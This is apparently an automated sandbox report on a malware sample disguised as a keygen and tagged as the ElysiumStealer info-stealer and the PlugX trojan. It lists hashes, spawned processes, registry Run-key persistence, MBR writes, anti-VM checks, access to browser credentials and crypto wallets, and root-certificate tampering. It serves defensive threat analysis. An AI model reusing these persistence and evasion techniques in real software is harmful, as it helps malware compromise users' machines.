elysiumstealer | a546a1f257585e2f4c093db2b7eeb6413a314ffb1296d97fd31d0363e827cc65

Analysis

max time kernel
151s
max time network
149s
platform
windows7_x64
resource
win7v20201028
submitted
06-03-2021 07:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

keygen-step-4.exe
Size

6.3MB
MD5

5f6a71ec27ed36a11d17e0989ffb0382
SHA1

a66b0e4d8ba90fc97e4d5eb37d7fbc12ade9a556
SHA256

a546a1f257585e2f4c093db2b7eeb6413a314ffb1296d97fd31d0363e827cc65
SHA512

d67e0f1627e5416aef1185aea2125c8502aac02b6d3e8eec301e344f5074bfce8b2aded37b2730a65c04b95b1ba6151e79048642ef1d0c9b32702f919b42f7b4

Score

10^/10

elysiumstealer plugx bootkit discovery evasion macro persistence spyware stealer themida trojan xlm

Malware Config

Signatures

ElysiumStealer
ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.
stealer elysiumstealer

ElysiumStealer Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2432-164-0x00000000003D0000-0x00000000003D6000-memory.dmp	elysiumstealer

PlugX
PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
trojan plugx
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Executes dropped EXE 64 IoCs

Processes:

file.exe3260.tmp.exe3260.tmp.exeSetup.exeC0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exeInstall.exemultitimer.exeaskinstall20.exemd2_2efs.exemultitimer.exeBTRSetp.exe6521242.712793302.304960374.544086859.44gcttt.exejfiag3g_gg.exejfiag3g_gg.exeWindows Host.exeDriver.exeDriver.exeThunderFW.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeMiniThunderPlatform.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exe

pid	process
1472	file.exe
548	3260.tmp.exe
968	3260.tmp.exe
1172	Setup.exe
1168	C0CA61A12E4C8B38.exe
1552	C0CA61A12E4C8B38.exe
536	Install.exe
1520	multitimer.exe
1432	askinstall20.exe
2088	md2_2efs.exe
2252	multitimer.exe
2108	BTRSetp.exe
2556	6521242.71
2520	2793302.30
2460	4960374.54
2432	4086859.44
2404	gcttt.exe
2372	jfiag3g_gg.exe
2292	jfiag3g_gg.exe
3064	Windows Host.exe
392	Driver.exe
2132	Driver.exe
1068	ThunderFW.exe
1924	Driver.exe
304	Driver.exe
2788	Driver.exe
2096	Driver.exe
2712	Driver.exe
2632	Driver.exe
2256	Driver.exe
2580	MiniThunderPlatform.exe
1588	Driver.exe
2392	Driver.exe
2356	Driver.exe
1932	Driver.exe
1532	Driver.exe
1148	Driver.exe
1172	Driver.exe
1304	Driver.exe
3032	Driver.exe
2992	Driver.exe
2896	Driver.exe
1764	Driver.exe
1508	Driver.exe
804	Driver.exe
756	Driver.exe
2852	Driver.exe
2428	Driver.exe
892	Driver.exe
2932	Driver.exe
2136	Driver.exe
2124	Driver.exe
2088	Driver.exe
2672	Driver.exe
1924	Driver.exe
1740	Driver.exe
2252	Driver.exe
1824	Driver.exe
2188	Driver.exe
2172	Driver.exe
2424	Driver.exe
1892	Driver.exe
2732	Driver.exe
2500	Driver.exe

Suspicious Office macro 1 IoCs

Office document equipped with 4.0 macros.

macro xlm

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\gdiview.msi	office_xlm_macros

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

4960374.54

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4960374.54
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4960374.54

Drops startup file 1 IoCs

Processes:

4960374.54

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url 4960374.54

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	4960374.54

Loads dropped DLL 52 IoCs

Processes:

keygen-step-4.exefile.exeMsiExec.exeSetup.exegcttt.exe2793302.304086859.444960374.54C0CA61A12E4C8B38.exeMiniThunderPlatform.exe

pid	process
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1472	file.exe
1472	file.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
912	MsiExec.exe
1172	Setup.exe
1172	Setup.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
1888	keygen-step-4.exe
2404	gcttt.exe
2404	gcttt.exe
2404	gcttt.exe
2404	gcttt.exe
2520	2793302.30
2520	2793302.30
2432	4086859.44
2460	4960374.54
1168	C0CA61A12E4C8B38.exe
1168	C0CA61A12E4C8B38.exe
1168	C0CA61A12E4C8B38.exe
1168	C0CA61A12E4C8B38.exe
1168	C0CA61A12E4C8B38.exe
1168	C0CA61A12E4C8B38.exe
2580	MiniThunderPlatform.exe
2580	MiniThunderPlatform.exe
2580	MiniThunderPlatform.exe
2580	MiniThunderPlatform.exe
2580	MiniThunderPlatform.exe
2580	MiniThunderPlatform.exe
2580	MiniThunderPlatform.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

themida 2 IoCs

Detects Themida, Advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\ProgramData\4960374.54	themida
behavioral1/memory/2460-157-0x0000000000240000-0x0000000000241000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

gcttt.exe4960374.542793302.30

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gcttt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\4960374.54"	4960374.54
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	2793302.30

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

4960374.54

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4960374.54

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4960374.54

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

23 api.ipify.org
59 ip-api.com

flow	ioc
23	api.ipify.org
59	ip-api.com

Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

Processes:

Setup.exeC0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exeMiniThunderPlatform.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe
File opened for modification	\??\PhysicalDrive0	MiniThunderPlatform.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

Setup.exe4960374.54

pid process

1172 Setup.exe
2460 4960374.54

pid	process
1172	Setup.exe
2460	4960374.54

Suspicious use of SetThreadContext 4 IoCs

Processes:

3260.tmp.exeC0CA61A12E4C8B38.exe

description	pid	process	target process
PID 548 set thread context of 968	548	3260.tmp.exe	3260.tmp.exe
PID 1168 set thread context of 2740	1168	C0CA61A12E4C8B38.exe	firefox.exe
PID 1168 set thread context of 2476	1168	C0CA61A12E4C8B38.exe	firefox.exe
PID 1168 set thread context of 2348	1168	C0CA61A12E4C8B38.exe	firefox.exe

Drops file in Windows directory 2 IoCs

Processes:

multitimer.exe

description	ioc	process
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

3260.tmp.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	3260.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	3260.tmp.exe

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1068 taskkill.exe
392 taskkill.exe

pid	process
1068	taskkill.exe
392	taskkill.exe

Modifies data under HKEY_USERS 62 IoCs

Processes:

file.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	file.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C88B0D75-95D7-40B2-89BD-4A3AD4DC11FD}\WpadNetworkName = "Network"	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C88B0D75-95D7-40B2-89BD-4A3AD4DC11FD}	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\PegasPc	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings	file.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionReason = "1"	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	file.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDetectedUrl	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	file.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	file.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C88B0D75-95D7-40B2-89BD-4A3AD4DC11FD}\WpadDecisionReason = "1"	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	file.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecision = "0"	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	file.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionTime = b0623f645a12d701	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	file.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	file.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy = "1"	file.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	file.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C88B0D75-95D7-40B2-89BD-4A3AD4DC11FD}\WpadDecisionTime = b0623f645a12d701	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	file.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C88B0D75-95D7-40B2-89BD-4A3AD4DC11FD}\WpadDecision = "0"	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C88B0D75-95D7-40B2-89BD-4A3AD4DC11FD}\32-e2-17-db-d2-77	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	file.exe

Modifies system certificate store 2 TTPs 15 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

file.exeSetup.exeInstall.exe6521242.71

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Install.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	6521242.71
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	6521242.71
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619